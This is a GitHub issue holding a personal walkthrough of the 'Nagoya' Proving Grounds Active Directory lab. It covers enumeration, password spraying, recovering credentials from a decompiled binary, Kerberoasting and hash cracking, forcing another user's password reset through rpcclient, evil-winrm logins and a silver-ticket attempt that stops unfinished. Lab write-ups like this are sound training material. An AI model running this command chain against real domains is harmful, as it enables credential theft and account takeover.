search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Nagoya (Hard, Windows AD, 2023) ★ #59

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago 
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0

88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-11 05:49:11Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|   DNS_Domain_Name: nagoya-industries.com
|   DNS_Computer_Name: nagoya.nagoya-industries.com
|   DNS_Tree_Name: nagoya-industries.com
|   Product_Version: 10.0.17763

5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49693/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49708/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

53/tcp

--> no info

139/tcp (SMB)

--> no info

389/tcp (LDAP)

ldapsearch -H ldap://192.168.208.21 -x -s base namingcontexts -->

dn:
namingcontexts: DC=nagoya-industries,DC=com
namingcontexts: CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: CN=Schema,CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: DC=DomainDnsZones,DC=nagoya-industries,DC=com
namingcontexts: DC=ForestDnsZones,DC=nagoya-industries,DC=com

ldapsearch -H ldap://192.168.208.21 -x -b"DC=nagoya-industries,DC=com" --> no info

80/tcp

image

/team --> Get a list of name image --> made a username list (userlist.txt) that looks like this one below image

/error image

crackmapexec smb $IP -u userlist.txt -p /usr/shares/wordlists/rockyou.txt --> no result

Guess a password is Summer2023 --> Reason: a wild guess that the nagoya machine was release on summer 2023. crackmapexec smb 192.168.165.21 -u user.txt -p Summer2023 --> Fiona.clark

smbclient -U 'Fiona.clark' //192.168.218.21/SYSVOL image

Found "\nagoya-industries.com\scripts\ResetPassword\ResetPassword.exe" file strings ResetPassword.exe --> didn'd find interesting info

On kali, install ILSpy plugin for Visual Studio Code (Click on Extensions and search ILSpy). image --> svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg

impacket-GetUserSPNs -request nagoya-industries.com/fiona.clark:'Summer2023' -dc-ip 192.168.218.21 image --> found a username: svc_mssql and hash $krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$24ea48f39707997f007ceb4f3bc3124b$cd6271cfe64.......

crack the hash above john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt image --> svc_mssql:Service1

evil-winrm -i 192.168.218.21 -u svc_mssql -p 'Service1'
evil-winrm -i 192.168.218.21 -u svc_helpdesk -p 'U299iYRmikYTHDbPbxPoYYfa2j4x4cdg'

--> all failed

rpcclient -U nagoya-industries/svc_helpdesk 192.168.218.21 Refer rpcclient commands (https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-smb/rpcclient-enumeration) image image image

Found that Christopher.Lewis] rid:[0x46c] has 3 groups and others only have 2 groups image --> group:[developers] rid:[0x46a]

Note: In the rpcclient tool, the setuserinfo function is used to modify user account information on a remote Windows system.

setuserinfo christopher.lewis 23 'Pass123!' image

evil-winrm -i 192.168.218.21 -u christopher.lewis -p 'Pass123!' image

WDavid404 commented 3 months ago

PE

svc_mssql is a service account and we found a folder at c:\user\svc_mssql. As we discover the svc_mssqlaccount but never see port 1433 open during nmap, we decide to check if it run locally via netstat. image --> no 1433 port

Create a Silver Ticket

mimikatz.exe didn't work..

To create a Silver Ticket, we need

  1. SPN password hash
  2. Domain SID
  3. Target SPN

Generate NTLM with "Service1" (https://www.browserling.com/tools/all-hashes) --> E3A0168BC21CFB88B95C954A5B18F57C image

Get-ADdomain image

Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames image

On kali, impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator image

Export the variable export KRB5CCNAME=$PWD/Administrator.ccache

impacket-mssqlclient nagoya-industries.com/svc_mssql:Service1@192.168.218.21 -windows-auth --> doesn`t work because the port 1433/tcp doesn't open!

The local port also didn't open on 1433/tcp, so i cannot go ahead....